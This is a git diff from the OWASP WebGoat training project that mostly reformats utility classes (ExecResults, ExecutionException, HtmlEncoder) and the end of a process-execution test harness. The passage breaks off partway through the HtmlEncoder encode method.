+		System.out.println(results);
+		System.out.println("-------------------------------------------" + sep
+				+ "TEST 6:ExecTimeout process never outputs");
+		results = Exec.execTimeout("c:/swarm-2.1.1/bin/sleep.exe 20", 5 * 1000);
+		System.out.println(results);
+		System.out.println("-------------------------------------------" + sep
+				+ "TEST 7:ExecTimeout process waits for input");
+		results = Exec.execTimeout("c:/swarm-2.1.1/bin/cat", 5 * 1000);
+		System.out.println(results);
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/util/ExecResults.java b/main/project/JavaSource/org/owasp/webgoat/util/ExecResults.java
index b3dd1c5de..7cd0d6713 100644
--- a/main/project/JavaSource/org/owasp/webgoat/util/ExecResults.java
+++ b/main/project/JavaSource/org/owasp/webgoat/util/ExecResults.java
@@ -1,360 +1,353 @@
+
 package org.owasp.webgoat.util;
 
-/*******************************************************************************
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
+ * 
  * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
  */
 public class ExecResults
 {
 
-    /**
-     *  Description of the Field
-     */
-    public final static int BADRETURNCODE = 2;
+	/**
+	 * Description of the Field
+	 */
+	public final static int BADRETURNCODE = 2;
 
-    /**
-     *  Description of the Field
-     */
-    public final static int THROWABLE = 1;
+	/**
+	 * Description of the Field
+	 */
+	public final static int THROWABLE = 1;
 
-    private String myCommand;
+	private String myCommand;
 
-    private boolean myError = false;
+	private boolean myError = false;
 
-    private int myErrorType = 0;
+	private int myErrorType = 0;
 
-    private String myErrors = null;
+	private String myErrors = null;
 
-    private String myInput;
+	private String myInput;
 
-    private boolean myInterrupted = false;
+	private boolean myInterrupted = false;
 
-    private String myOutput = null;
+	private String myOutput = null;
 
-    private int myReturnCode = 0;
+	private int myReturnCode = 0;
 
-    private int mySuccessCode;
+	private int mySuccessCode;
 
-    private Throwable myThrowable = null;
+	private Throwable myThrowable = null;
 
-    private int myTimeout;
+	private int myTimeout;
 
-
-    /**
-     *  Constructor for the ExecResults object
-     *
-     *@param  command      Description of the Parameter
-     *@param  input        Description of the Parameter
-     *@param  successCode  Description of the Parameter
-     *@param  timeout      Description of the Parameter
-     */
-    public ExecResults(String command, String input, int successCode,
-	    int timeout)
-    {
-	myCommand = command.trim();
-	myInput = input.trim();
-	mySuccessCode = successCode;
-	myTimeout = timeout;
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     *@param  haystack   Description of the Parameter
-     *@param  needle     Description of the Parameter
-     *@param  fromIndex  Description of the Parameter
-     *@return            Description of the Return Value
-     */
-    private boolean contains(String haystack, String needle, int fromIndex)
-    {
-	return (haystack.trim().toLowerCase().indexOf(
-		needle.trim().toLowerCase(), fromIndex) != -1);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     *@param  value  Description of the Parameter
-     *@return        Description of the Return Value
-     */
-    public boolean errorsContains(String value)
-    {
-	return (errorsContains(value, 0));
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     *@param  value      Description of the Parameter
-     *@param  fromIndex  Description of the Parameter
-     *@return            Description of the Return Value
-     */
-    public boolean errorsContains(String value, int fromIndex)
-    {
-	return (contains(myErrors, value, fromIndex));
-    }
-
-
-    /**
-     *  Gets the error attribute of the ExecResults object
-     *
-     *@return    The error value
-     */
-    public boolean getError()
-    {
-	return (myError);
-    }
-
-
-    /**
-     *  Gets the errorMessage attribute of the ExecResults object
-     *
-     *@return    The errorMessage value
-     */
-    public String getErrorMessage()
-    {
-	switch (getErrorType())
+	/**
+	 * Constructor for the ExecResults object
+	 * 
+	 * @param command
+	 *            Description of the Parameter
+	 * @param input
+	 *            Description of the Parameter
+	 * @param successCode
+	 *            Description of the Parameter
+	 * @param timeout
+	 *            Description of the Parameter
+	 */
+	public ExecResults(String command, String input, int successCode, int timeout)
 	{
-	    case THROWABLE:
-		return ("Exception: " + myThrowable.getMessage());
-
-	    case BADRETURNCODE:
-		return ("Bad return code (expected " + mySuccessCode + ")");
-
-	    default:
-		return ("Unknown error");
-	}
-    }
-
-
-    /**
-     *  Gets the errorType attribute of the ExecResults object
-     *
-     *@return    The errorType value
-     */
-    public int getErrorType()
-    {
-	return (myErrorType);
-    }
-
-
-    /**
-     *  Gets the errors attribute of the ExecResults object
-     *
-     *@return    The errors value
-     */
-    public String getErrors()
-    {
-	return (myErrors);
-    }
-
-
-    /**
-     *  Gets the interrupted attribute of the ExecResults object
-     *
-     *@return    The interrupted value
-     */
-    public boolean getInterrupted()
-    {
-	return (myInterrupted);
-    }
-
-
-    /**
-     *  Gets the output attribute of the ExecResults object
-     *
-     *@return    The output value
-     */
-    public String getOutput()
-    {
-	return (myOutput);
-    }
-
-
-    /**
-     *  Gets the returnCode attribute of the ExecResults object
-     *
-     *@return    The returnCode value
-     */
-    public int getReturnCode()
-    {
-	return (myReturnCode);
-    }
-
-
-    /**
-     *  Gets the throwable attribute of the ExecResults object
-     *
-     *@return    The throwable value
-     */
-    public Throwable getThrowable()
-    {
-	return (myThrowable);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     *@param  value  Description of the Parameter
-     *@return        Description of the Return Value
-     */
-    public boolean outputContains(String value)
-    {
-	return (outputContains(value, 0));
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     *@param  value      Description of the Parameter
-     *@param  fromIndex  Description of the Parameter
-     *@return            Description of the Return Value
-     */
-    public boolean outputContains(String value, int fromIndex)
-    {
-	return (contains(myOutput, value, fromIndex));
-    }
-
-
-    /**
-     *  Sets the error attribute of the ExecResults object
-     *
-     *@param  value  The new error value
-     */
-    public void setError(int value)
-    {
-	myError = true;
-	myErrorType = value;
-    }
-
-
-    /**
-     *  Sets the errors attribute of the ExecResults object
-     *
-     *@param  errors  The new errors value
-     */
-    public void setErrors(String errors)
-    {
-	myErrors = errors.trim();
-    }
-
-
-    /**
-     *  Sets the interrupted attribute of the ExecResults object
-     */
-    public void setInterrupted()
-    {
-	myInterrupted = true;
-    }
-
-
-    /**
-     *  Sets the output attribute of the ExecResults object
-     *
-     *@param  value  The new output value
-     */
-    public void setOutput(String value)
-    {
-	myOutput = value.trim();
-    }
-
-
-    /**
-     *  Sets the returnCode attribute of the ExecResults object
-     *
-     *@param  value  The new returnCode value
-     */
-    public void setReturnCode(int value)
-    {
-	myReturnCode = value;
-    }
-
-
-    /**
-     *  Sets the throwable attribute of the ExecResults object
-     *
-     *@param  value  The new throwable value
-     */
-    public void setThrowable(Throwable value)
-    {
-	setError(THROWABLE);
-	myThrowable = value;
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     *@return    Description of the Return Value
-     */
-    public String toString()
-    {
-	String sep = System.getProperty("line.separator");
-	StringBuffer value = new StringBuffer();
-	value.append("ExecResults for \'" + myCommand + "\'" + sep);
-
-	if ((myInput != null) && !myInput.equals(""))
-	{
-	    value.append(sep + "Input..." + sep + myInput + sep);
+		myCommand = command.trim();
+		myInput = input.trim();
+		mySuccessCode = successCode;
+		myTimeout = timeout;
 	}
 
-	if ((myOutput != null) && !myOutput.equals(""))
+	/**
+	 * Description of the Method
+	 * 
+	 * @param haystack
+	 *            Description of the Parameter
+	 * @param needle
+	 *            Description of the Parameter
+	 * @param fromIndex
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	private boolean contains(String haystack, String needle, int fromIndex)
 	{
-	    value.append(sep + "Output..." + sep + myOutput + sep);
+		return (haystack.trim().toLowerCase().indexOf(needle.trim().toLowerCase(), fromIndex) != -1);
 	}
 
-	if ((myErrors != null) && !myErrors.equals(""))
+	/**
+	 * Description of the Method
+	 * 
+	 * @param value
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public boolean errorsContains(String value)
 	{
-	    value.append(sep + "Errors..." + sep + myErrors + sep);
+		return (errorsContains(value, 0));
 	}
 
-	value.append(sep);
-
-	if (myInterrupted)
+	/**
+	 * Description of the Method
+	 * 
+	 * @param value
+	 *            Description of the Parameter
+	 * @param fromIndex
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public boolean errorsContains(String value, int fromIndex)
 	{
-	    value.append("Command timed out after " + (myTimeout / 1000)
-		    + " seconds " + sep);
+		return (contains(myErrors, value, fromIndex));
 	}
 
-	value.append("Returncode: " + myReturnCode + sep);
-
-	if (myError)
+	/**
+	 * Gets the error attribute of the ExecResults object
+	 * 
+	 * @return The error value
+	 */
+	public boolean getError()
 	{
-	    value.append(getErrorMessage() + sep);
+		return (myError);
 	}
 
-	return (value.toString());
-    }
+	/**
+	 * Gets the errorMessage attribute of the ExecResults object
+	 * 
+	 * @return The errorMessage value
+	 */
+	public String getErrorMessage()
+	{
+		switch (getErrorType())
+		{
+			case THROWABLE:
+				return ("Exception: " + myThrowable.getMessage());
+
+			case BADRETURNCODE:
+				return ("Bad return code (expected " + mySuccessCode + ")");
+
+			default:
+				return ("Unknown error");
+		}
+	}
+
+	/**
+	 * Gets the errorType attribute of the ExecResults object
+	 * 
+	 * @return The errorType value
+	 */
+	public int getErrorType()
+	{
+		return (myErrorType);
+	}
+
+	/**
+	 * Gets the errors attribute of the ExecResults object
+	 * 
+	 * @return The errors value
+	 */
+	public String getErrors()
+	{
+		return (myErrors);
+	}
+
+	/**
+	 * Gets the interrupted attribute of the ExecResults object
+	 * 
+	 * @return The interrupted value
+	 */
+	public boolean getInterrupted()
+	{
+		return (myInterrupted);
+	}
+
+	/**
+	 * Gets the output attribute of the ExecResults object
+	 * 
+	 * @return The output value
+	 */
+	public String getOutput()
+	{
+		return (myOutput);
+	}
+
+	/**
+	 * Gets the returnCode attribute of the ExecResults object
+	 * 
+	 * @return The returnCode value
+	 */
+	public int getReturnCode()
+	{
+		return (myReturnCode);
+	}
+
+	/**
+	 * Gets the throwable attribute of the ExecResults object
+	 * 
+	 * @return The throwable value
+	 */
+	public Throwable getThrowable()
+	{
+		return (myThrowable);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param value
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public boolean outputContains(String value)
+	{
+		return (outputContains(value, 0));
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param value
+	 *            Description of the Parameter
+	 * @param fromIndex
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public boolean outputContains(String value, int fromIndex)
+	{
+		return (contains(myOutput, value, fromIndex));
+	}
+
+	/**
+	 * Sets the error attribute of the ExecResults object
+	 * 
+	 * @param value
+	 *            The new error value
+	 */
+	public void setError(int value)
+	{
+		myError = true;
+		myErrorType = value;
+	}
+
+	/**
+	 * Sets the errors attribute of the ExecResults object
+	 * 
+	 * @param errors
+	 *            The new errors value
+	 */
+	public void setErrors(String errors)
+	{
+		myErrors = errors.trim();
+	}
+
+	/**
+	 * Sets the interrupted attribute of the ExecResults object
+	 */
+	public void setInterrupted()
+	{
+		myInterrupted = true;
+	}
+
+	/**
+	 * Sets the output attribute of the ExecResults object
+	 * 
+	 * @param value
+	 *            The new output value
+	 */
+	public void setOutput(String value)
+	{
+		myOutput = value.trim();
+	}
+
+	/**
+	 * Sets the returnCode attribute of the ExecResults object
+	 * 
+	 * @param value
+	 *            The new returnCode value
+	 */
+	public void setReturnCode(int value)
+	{
+		myReturnCode = value;
+	}
+
+	/**
+	 * Sets the throwable attribute of the ExecResults object
+	 * 
+	 * @param value
+	 *            The new throwable value
+	 */
+	public void setThrowable(Throwable value)
+	{
+		setError(THROWABLE);
+		myThrowable = value;
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @return Description of the Return Value
+	 */
+	public String toString()
+	{
+		String sep = System.getProperty("line.separator");
+		StringBuffer value = new StringBuffer();
+		value.append("ExecResults for \'" + myCommand + "\'" + sep);
+
+		if ((myInput != null) && !myInput.equals(""))
+		{
+			value.append(sep + "Input..." + sep + myInput + sep);
+		}
+
+		if ((myOutput != null) && !myOutput.equals(""))
+		{
+			value.append(sep + "Output..." + sep + myOutput + sep);
+		}
+
+		if ((myErrors != null) && !myErrors.equals(""))
+		{
+			value.append(sep + "Errors..." + sep + myErrors + sep);
+		}
+
+		value.append(sep);
+
+		if (myInterrupted)
+		{
+			value.append("Command timed out after " + (myTimeout / 1000) + " seconds " + sep);
+		}
+
+		value.append("Returncode: " + myReturnCode + sep);
+
+		if (myError)
+		{
+			value.append(getErrorMessage() + sep);
+		}
+
+		return (value.toString());
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/util/ExecutionException.java b/main/project/JavaSource/org/owasp/webgoat/util/ExecutionException.java
index bf2cfcee5..358bfc8b2 100644
--- a/main/project/JavaSource/org/owasp/webgoat/util/ExecutionException.java
+++ b/main/project/JavaSource/org/owasp/webgoat/util/ExecutionException.java
@@ -1,61 +1,59 @@
+
 package org.owasp.webgoat.util;
 
-/*******************************************************************************
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
+ * 
  * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
  */
 public class ExecutionException extends Exception
 {
 
-    /**
+	/**
 	 * 
 	 */
 	private static final long serialVersionUID = 7282947463831152092L;
 
+	/**
+	 * Constructor for the ExecutionException object
+	 */
+	public ExecutionException()
+	{
+		super();
+	}
 
 	/**
-     *  Constructor for the ExecutionException object
-     */
-    public ExecutionException()
-    {
-	super();
-    }
-
-
-    /**
-     *  Constructor for the ExecutionException object
-     *
-     *@param  msg  Description of the Parameter
-     */
-    public ExecutionException(String msg)
-    {
-	super(msg);
-    }
+	 * Constructor for the ExecutionException object
+	 * 
+	 * @param msg
+	 *            Description of the Parameter
+	 */
+	public ExecutionException(String msg)
+	{
+		super(msg);
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/util/HtmlEncoder.java b/main/project/JavaSource/org/owasp/webgoat/util/HtmlEncoder.java
index 2c613c890..f6fed5351 100644
--- a/main/project/JavaSource/org/owasp/webgoat/util/HtmlEncoder.java
+++ b/main/project/JavaSource/org/owasp/webgoat/util/HtmlEncoder.java
@@ -1,225 +1,225 @@
+
 package org.owasp.webgoat.util;
 
 import java.util.HashMap;
 import java.util.Map;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class HtmlEncoder
 {
 
-    static Map<String, Integer> e2i = new HashMap<String, Integer>();
+	static Map<String, Integer> e2i = new HashMap<String, Integer>();
 
-    static Map<Integer, String> i2e = new HashMap<Integer, String>();
+	static Map<Integer, String> i2e = new HashMap<Integer, String>();
 
-    // html entity list
-    private static Object[][] entities = { { "quot", new Integer(34) }, // " - double-quote
-	    { "amp", new Integer(38) }, // & - ampersand
-	    { "lt", new Integer(60) }, // < - less-than
-	    { "gt", new Integer(62) }, // > - greater-than
-	    { "nbsp", new Integer(160) }, // non-breaking space
-	    { "copy", new Integer(169) }, // © - copyright
-	    { "reg", new Integer(174) }, // ® - registered trademark
-	    { "Agrave", new Integer(192) }, // À - uppercase A, grave accent
-	    { "Aacute", new Integer(193) }, // Á - uppercase A, acute accent
-	    { "Acirc", new Integer(194) }, // Â - uppercase A, circumflex accent
-	    { "Atilde", new Integer(195) }, // Ã - uppercase A, tilde
-	    { "Auml", new Integer(196) }, // Ä - uppercase A, umlaut
-	    { "Aring", new Integer(197) }, // Å - uppercase A, ring
-	    { "AElig", new Integer(198) }, // Æ - uppercase AE
-	    { "Ccedil", new Integer(199) }, // Ç - uppercase C, cedilla
-	    { "Egrave", new Integer(200) }, // È - uppercase E, grave accent
-	    { "Eacute", new Integer(201) }, // É - uppercase E, acute accent
-	    { "Ecirc", new Integer(202) }, // Ê - uppercase E, circumflex accent
-	    { "Euml", new Integer(203) }, // Ë - uppercase E, umlaut
-	    { "Igrave", new Integer(204) }, // Ì - uppercase I, grave accent
-	    { "Iacute", new Integer(205) }, // Í - uppercase I, acute accent
-	    { "Icirc", new Integer(206) }, // Î - uppercase I, circumflex accent
-	    { "Iuml", new Integer(207) }, // Ï - uppercase I, umlaut
-	    { "ETH", new Integer(208) }, // Ð - uppercase Eth, Icelandic
-	    { "Ntilde", new Integer(209) }, // Ñ - uppercase N, tilde
-	    { "Ograve", new Integer(210) }, // Ò - uppercase O, grave accent
-	    { "Oacute", new Integer(211) }, // Ó - uppercase O, acute accent
-	    { "Ocirc", new Integer(212) }, // Ô - uppercase O, circumflex accent
-	    { "Otilde", new Integer(213) }, // Õ - uppercase O, tilde
-	    { "Ouml", new Integer(214) }, // Ö - uppercase O, umlaut
-	    { "Oslash", new Integer(216) }, // Ø - uppercase O, slash
-	    { "Ugrave", new Integer(217) }, // Ù - uppercase U, grave accent
-	    { "Uacute", new Integer(218) }, // Ú - uppercase U, acute accent
-	    { "Ucirc", new Integer(219) }, // Û - uppercase U, circumflex accent
-	    { "Uuml", new Integer(220) }, // Ü - uppercase U, umlaut
-	    { "Yacute", new Integer(221) }, // Ý - uppercase Y, acute accent
-	    { "THORN", new Integer(222) }, // Þ - uppercase THORN, Icelandic
-	    { "szlig", new Integer(223) }, // ß - lowercase sharps, German
-	    { "agrave", new Integer(224) }, // à - lowercase a, grave accent
-	    { "aacute", new Integer(225) }, // á - lowercase a, acute accent
-	    { "acirc", new Integer(226) }, // â - lowercase a, circumflex accent
-	    { "atilde", new Integer(227) }, // ã - lowercase a, tilde
-	    { "auml", new Integer(228) }, // ä - lowercase a, umlaut
-	    { "aring", new Integer(229) }, // å - lowercase a, ring
-	    { "aelig", new Integer(230) }, // æ - lowercase ae
-	    { "ccedil", new Integer(231) }, // ç - lowercase c, cedilla
-	    { "egrave", new Integer(232) }, // è - lowercase e, grave accent
-	    { "eacute", new Integer(233) }, // é - lowercase e, acute accent
-	    { "ecirc", new Integer(234) }, // ê - lowercase e, circumflex accent
-	    { "euml", new Integer(235) }, // ë - lowercase e, umlaut
-	    { "igrave", new Integer(236) }, // ì - lowercase i, grave accent
-	    { "iacute", new Integer(237) }, // í - lowercase i, acute accent
-	    { "icirc", new Integer(238) }, // î - lowercase i, circumflex accent
-	    { "iuml", new Integer(239) }, // ï - lowercase i, umlaut
-	    { "igrave", new Integer(236) }, // ì - lowercase i, grave accent
-	    { "iacute", new Integer(237) }, // í - lowercase i, acute accent
-	    { "icirc", new Integer(238) }, // î - lowercase i, circumflex accent
-	    { "iuml", new Integer(239) }, // ï - lowercase i, umlaut
-	    { "eth", new Integer(240) }, // ð - lowercase eth, Icelandic
-	    { "ntilde", new Integer(241) }, // ñ - lowercase n, tilde
-	    { "ograve", new Integer(242) }, // ò - lowercase o, grave accent
-	    { "oacute", new Integer(243) }, // ó - lowercase o, acute accent
-	    { "ocirc", new Integer(244) }, // ô - lowercase o, circumflex accent
-	    { "otilde", new Integer(245) }, // õ - lowercase o, tilde
-	    { "ouml", new Integer(246) }, // ö - lowercase o, umlaut
-	    { "oslash", new Integer(248) }, // ø - lowercase o, slash
-	    { "ugrave", new Integer(249) }, // ù - lowercase u, grave accent
-	    { "uacute", new Integer(250) }, // ú - lowercase u, acute accent
-	    { "ucirc", new Integer(251) }, // û - lowercase u, circumflex accent
-	    { "uuml", new Integer(252) }, // ü - lowercase u, umlaut
-	    { "yacute", new Integer(253) }, // ý - lowercase y, acute accent
-	    { "thorn", new Integer(254) }, // þ - lowercase thorn, Icelandic
-	    { "yuml", new Integer(255) }, // ÿ - lowercase y, umlaut
-	    { "euro", new Integer(8364) },// Euro symbol
-    };
+	// html entity list
+	private static Object[][] entities = { { "quot", new Integer(34) }, // " - double-quote
+			{ "amp", new Integer(38) }, // & - ampersand
+			{ "lt", new Integer(60) }, // < - less-than
+			{ "gt", new Integer(62) }, // > - greater-than
+			{ "nbsp", new Integer(160) }, // non-breaking space
+			{ "copy", new Integer(169) }, // © - copyright
+			{ "reg", new Integer(174) }, // ® - registered trademark
+			{ "Agrave", new Integer(192) }, // À - uppercase A, grave accent
+			{ "Aacute", new Integer(193) }, // Á - uppercase A, acute accent
+			{ "Acirc", new Integer(194) }, // Â - uppercase A, circumflex accent
+			{ "Atilde", new Integer(195) }, // Ã - uppercase A, tilde
+			{ "Auml", new Integer(196) }, // Ä - uppercase A, umlaut
+			{ "Aring", new Integer(197) }, // Å - uppercase A, ring
+			{ "AElig", new Integer(198) }, // Æ - uppercase AE
+			{ "Ccedil", new Integer(199) }, // Ç - uppercase C, cedilla
+			{ "Egrave", new Integer(200) }, // È - uppercase E, grave accent
+			{ "Eacute", new Integer(201) }, // É - uppercase E, acute accent
+			{ "Ecirc", new Integer(202) }, // Ê - uppercase E, circumflex accent
+			{ "Euml", new Integer(203) }, // Ë - uppercase E, umlaut
+			{ "Igrave", new Integer(204) }, // Ì - uppercase I, grave accent
+			{ "Iacute", new Integer(205) }, // Í - uppercase I, acute accent
+			{ "Icirc", new Integer(206) }, // Î - uppercase I, circumflex accent
+			{ "Iuml", new Integer(207) }, // Ï - uppercase I, umlaut
+			{ "ETH", new Integer(208) }, // Ð - uppercase Eth, Icelandic
+			{ "Ntilde", new Integer(209) }, // Ñ - uppercase N, tilde
+			{ "Ograve", new Integer(210) }, // Ò - uppercase O, grave accent
+			{ "Oacute", new Integer(211) }, // Ó - uppercase O, acute accent
+			{ "Ocirc", new Integer(212) }, // Ô - uppercase O, circumflex accent
+			{ "Otilde", new Integer(213) }, // Õ - uppercase O, tilde
+			{ "Ouml", new Integer(214) }, // Ö - uppercase O, umlaut
+			{ "Oslash", new Integer(216) }, // Ø - uppercase O, slash
+			{ "Ugrave", new Integer(217) }, // Ù - uppercase U, grave accent
+			{ "Uacute", new Integer(218) }, // Ú - uppercase U, acute accent
+			{ "Ucirc", new Integer(219) }, // Û - uppercase U, circumflex accent
+			{ "Uuml", new Integer(220) }, // Ü - uppercase U, umlaut
+			{ "Yacute", new Integer(221) }, // Ý - uppercase Y, acute accent
+			{ "THORN", new Integer(222) }, // Þ - uppercase THORN, Icelandic
+			{ "szlig", new Integer(223) }, // ß - lowercase sharps, German
+			{ "agrave", new Integer(224) }, // à - lowercase a, grave accent
+			{ "aacute", new Integer(225) }, // á - lowercase a, acute accent
+			{ "acirc", new Integer(226) }, // â - lowercase a, circumflex accent
+			{ "atilde", new Integer(227) }, // ã - lowercase a, tilde
+			{ "auml", new Integer(228) }, // ä - lowercase a, umlaut
+			{ "aring", new Integer(229) }, // å - lowercase a, ring
+			{ "aelig", new Integer(230) }, // æ - lowercase ae
+			{ "ccedil", new Integer(231) }, // ç - lowercase c, cedilla
+			{ "egrave", new Integer(232) }, // è - lowercase e, grave accent
+			{ "eacute", new Integer(233) }, // é - lowercase e, acute accent
+			{ "ecirc", new Integer(234) }, // ê - lowercase e, circumflex accent
+			{ "euml", new Integer(235) }, // ë - lowercase e, umlaut
+			{ "igrave", new Integer(236) }, // ì - lowercase i, grave accent
+			{ "iacute", new Integer(237) }, // í - lowercase i, acute accent
+			{ "icirc", new Integer(238) }, // î - lowercase i, circumflex accent
+			{ "iuml", new Integer(239) }, // ï - lowercase i, umlaut
+			{ "igrave", new Integer(236) }, // ì - lowercase i, grave accent
+			{ "iacute", new Integer(237) }, // í - lowercase i, acute accent
+			{ "icirc", new Integer(238) }, // î - lowercase i, circumflex accent
+			{ "iuml", new Integer(239) }, // ï - lowercase i, umlaut
+			{ "eth", new Integer(240) }, // ð - lowercase eth, Icelandic
+			{ "ntilde", new Integer(241) }, // ñ - lowercase n, tilde
+			{ "ograve", new Integer(242) }, // ò - lowercase o, grave accent
+			{ "oacute", new Integer(243) }, // ó - lowercase o, acute accent
+			{ "ocirc", new Integer(244) }, // ô - lowercase o, circumflex accent
+			{ "otilde", new Integer(245) }, // õ - lowercase o, tilde
+			{ "ouml", new Integer(246) }, // ö - lowercase o, umlaut
+			{ "oslash", new Integer(248) }, // ø - lowercase o, slash
+			{ "ugrave", new Integer(249) }, // ù - lowercase u, grave accent
+			{ "uacute", new Integer(250) }, // ú - lowercase u, acute accent
+			{ "ucirc", new Integer(251) }, // û - lowercase u, circumflex accent
+			{ "uuml", new Integer(252) }, // ü - lowercase u, umlaut
+			{ "yacute", new Integer(253) }, // ý - lowercase y, acute accent
+			{ "thorn", new Integer(254) }, // þ - lowercase thorn, Icelandic
+			{ "yuml", new Integer(255) }, // ÿ - lowercase y, umlaut
+			{ "euro", new Integer(8364) },// Euro symbol
+	};
 
-
-    public HtmlEncoder()
-    {
-	for (int i = 0; i < entities.length; i++)
-	    e2i.put((String)entities[i][0], (Integer)entities[i][1]);
-	for (int i = 0; i < entities.length; i++)
-	    i2e.put((Integer)entities[i][1], (String)entities[i][0]);
-    }
-
-
-    /**
-     *  Turns funky characters into HTML entity equivalents<p>
-     *
-     *  e.g. <tt>"bread" & "butter"</tt> => <tt>&amp;quot;bread&amp;quot; &amp;amp;
-     *  &amp;quot;butter&amp;quot;</tt> . Update: supports nearly all HTML entities, including funky
-     *  accents. See the source code for more detail. Adapted from
-     *  http://www.purpletech.com/code/src/com/purpletech/util/Utils.java.
-     *
-     * @param  s1  Description of the Parameter
-     * @return     Description of the Return Value
-     */
-    public static String encode(String s1)
-    {
-	StringBuffer buf = new StringBuffer();
-
-	int i;
-	for (i = 0; i < s1.length(); ++i)
+	public HtmlEncoder()
 	{
-	    char ch = s1.charAt(i);
-
-	    String entity = i2e.get(new Integer((int) ch));
-
-	    if (entity == null)
-	    {
-		if (((int) ch) > 128)
-		{
